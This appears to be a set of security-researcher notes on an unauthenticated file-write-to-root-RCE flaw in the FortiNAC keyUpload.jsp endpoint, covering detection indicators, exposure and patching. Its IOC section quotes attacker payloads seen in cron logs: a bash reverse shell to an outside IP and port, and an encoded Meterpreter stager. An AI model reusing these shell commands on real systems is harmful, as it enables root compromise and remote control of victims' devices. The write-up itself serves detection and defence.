This vulnerability is an arbitrary file write in the configurationWizard/keyUpload.jsp endpoint. The arbitrary file write results in unauthenticated remote code execution in the context of the root user.

A FortiNAC device provides protection against IoT threats, extends control to third-party devices, and orchestrates automatic responses to a wide range of networking events.. Despite these devices not having much of an internet facing footprint, if an attacker already inside your network gains root access to this device it will provide a great starting point to corrode the integrity of the rest of your network. Exploitation is trivial.

IOCs

The original PoC as well as the metasploit module both use the arbitrary file write to drop a cron job (inside /etc/cron.d/) that initiates a reverse shell as the root user.

A target compromised by the original PoC would have a log line in /var/log/cron similar to:

Mar  8 11:40:01 localhost CROND[17120]: (root) CMD (bash -i >& /dev/tcp/192.168.123.1/4444 0>&1)

Whereas a target compromised by the metasploit module, will leave slightly different log lines in /var/log/cron depending on the Meterpreter session returned.

Python Meterpreter:

Mar  8 15:44:01 localhost CROND[11377]: (root) CMD (python /tmp/gSYDIjeD 0>&1)
Mar  8 15:44:03 localhost CROND[8878]: (root) CMDOUT (Traceback (most recent call last):)
Mar  8 15:44:03 localhost CROND[8878]: (root) CMDOUT (  File "/tmp/gSYDIjeD", line 1, in <module>)
Mar  8 15:44:03 localhost CROND[8878]: (root) CMDOUT (    exec(__import__('zlib').decompress(__import__('base64').b64decode(__import__('codecs').getencoder('utf-8')('eNo9UE1LxDAQPTe/IrdkMIamxrIuVhDxICKCuzeRpU1HLU3TkmS1Kv53N3TxMsN78+bNRzdMo480jKbHKL5t14imDlhqEaLfmyhiNyB5HT2daeeor90bcpXDmmTRfx1iFqqlWS6JF+KIN48397vN9un2+gGSTprROTSRc6YuCqnKlVTFmVRMaK1zSJrGY92TDGeDU0zmaboMFnHi50BstSwl926qTc/Z1R0TQXo0H1wDPOcvpK2O2AL5fO8sUouOt3BpD3btyX/1dKGB4IyGp7tli2YcJo8h8OUFsil1IltMSvHDAluHXyB/G3tfLA==')[0]))))
Mar  8 15:44:03 localhost CROND[8878]: (root) CMDOUT (  File "<string>", line 9, in <module>)

Linux Meterpreter:

Mar  8 15:46:01 localhost CROND[11595]: (root) CMD (chmod +x /tmp/vprwoPAh && /tmp/vprwoPAh 0>&1)

Of course, logs and the cron job files themselves can be cleaned up once root access is gained. In addition, there are also different ways to achieve RCE from an arbitrary file write. During testing I was able to drop a .jsp payload in the application webroot, although once triggered it returned a shell in the context of the user running the application and not the root user. Just be aware there could be IOCs outside /var/log/cron

This is getting a lot of attention, but despite the chatter, it doesn’t actually appear to be exploited widely (yet) and has virtually no internet-exposed attack surface area, so I’m not sure it’s gonna get there. The device itself looks like a great target and if you use it you should patch it, but it’s not commonly exposed, and this shouldn’t be confused with other Fortinet vulns that live in products with tens or hundreds of thousands of systems chillaxin’ on the internet.

No opinion from our research folks yet on exploitability if you’re in a network with access to a vulnerable target. Public PoC exists and it looks like a few different security vendors are seeing honeypot hits, but only from a couple IPs so far. May increase, may not, we’ll see.

Fortinet’s researcher Gwendal Guégniaud discovered a RCE vulnerability on the Fortinet NAC (Network Access Control) device. The vulnerability in the keyUpload.jsp file, allows an unauthenticated attacker to write arbitrary files on the system. As a result, the uploaded code will be executed under the user rights of root.

Since these types of devices sit at the network perimeter of companies, it is an interesting target as we have observed in many ransomware attacks, where the initial attack starts compromising a network perimeter device.

With the release of a PoC by Horizon3ai, ShadowServer’s Honeypots has already reported scanning activity.
The exploit has been tested and works against vulnerable devices: